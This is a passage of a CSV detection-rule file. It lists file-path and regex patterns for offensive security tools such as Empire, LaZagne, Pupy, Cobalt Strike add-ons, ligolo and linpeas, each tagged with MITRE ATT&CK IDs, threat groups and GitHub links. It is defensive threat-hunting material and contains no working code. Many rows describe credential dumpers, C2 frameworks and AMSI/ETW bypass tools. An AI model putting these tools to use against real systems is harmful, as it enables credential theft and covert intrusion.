primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/lateral_movement/*.ps1",".{0,1000}\/lateral_movement\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/lazagne.exe*",".{0,1000}\/lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/LaZagne.git*",".{0,1000}\/LaZagne\.git.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/laZagne.py*",".{0,1000}\/laZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/LaZagne.py*",".{0,1000}\/LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/lazagne.zip*",".{0,1000}\/lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/LaZagne/Windows/*",".{0,1000}\/LaZagne\/Windows\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/ldap.py*",".{0,1000}\/ldap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/ldap_injection.txt*",".{0,1000}\/ldap_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldap_search_bof.py*",".{0,1000}\/ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/ldap-brute.nse*",".{0,1000}\/ldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldap-checker.py*",".{0,1000}\/ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ldapnomnom@latest*",".{0,1000}\/ldapnomnom\@latest.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*/ldap-novell-getpass.nse*",".{0,1000}\/ldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/LDAP-Password-Hunter.git*",".{0,1000}\/LDAP\-Password\-Hunter\.git.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/LDAPPER.git*",".{0,1000}\/LDAPPER\.git.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*/ldapper.py*",".{0,1000}\/ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*/LDAPPER-master*",".{0,1000}\/LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*/ldapph.db*",".{0,1000}\/ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/LdapRelayScan.git*",".{0,1000}\/LdapRelayScan\.git.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*/ldap-rootdse.nse*",".{0,1000}\/ldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldap-search.nse*",".{0,1000}\/ldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldapsearch-ad.git*",".{0,1000}\/ldapsearch\-ad\.git.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "*/ldapsearch-ad.py*",".{0,1000}\/ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/LDAPWordlistHarvester.git*",".{0,1000}\/LDAPWordlistHarvester\.git.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*/ldeep/*",".{0,1000}\/ldeep\/.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*/ldeepDump*",".{0,1000}\/ldeepDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/LdrLockLiberator.git*",".{0,1000}\/LdrLockLiberator\.git.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*/legba.git*",".{0,1000}\/legba\.git.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*/legba/target/release/legba*",".{0,1000}\/legba\/target\/release\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*/letmein.ps1*",".{0,1000}\/letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/LetMeOutSharp/*",".{0,1000}\/LetMeOutSharp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*/LetMeowIn.git*",".{0,1000}\/LetMeowIn\.git.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*/lexmark-config.nse*",".{0,1000}\/lexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lfs_injection.exe*",".{0,1000}\/lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/lgandx/Responder*",".{0,1000}\/lgandx\/Responder.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/lib/GHunt/*",".{0,1000}\/lib\/GHunt\/.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*/lib/ipLookupHelper.py*",".{0,1000}\/lib\/ipLookupHelper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*/lib/msf/*",".{0,1000}\/lib\/msf\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/libgobuster*",".{0,1000}\/libgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/liboffsetfinder64*",".{0,1000}\/liboffsetfinder64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/LibSnaffle*",".{0,1000}\/LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*/LightsOut.git*",".{0,1000}\/LightsOut\.git.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*/ligolo.git*",".{0,1000}\/ligolo\.git.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*/ligolo-ng*",".{0,1000}\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*/ligolo-ng.git*",".{0,1000}\/ligolo\-ng\.git.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*/ligolo-ng/releases*",".{0,1000}\/ligolo\-ng\/releases.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*/Lime-Crypter.git*",".{0,1000}\/Lime\-Crypter\.git.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*/LinEnum.git*",".{0,1000}\/LinEnum\.git.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*/LinEnum/*",".{0,1000}\/LinEnum\/.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","10","10","6668","1964","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*/linikatz.git*",".{0,1000}\/linikatz\.git.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*/LinikatzV2/*",".{0,1000}\/LinikatzV2\/.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" 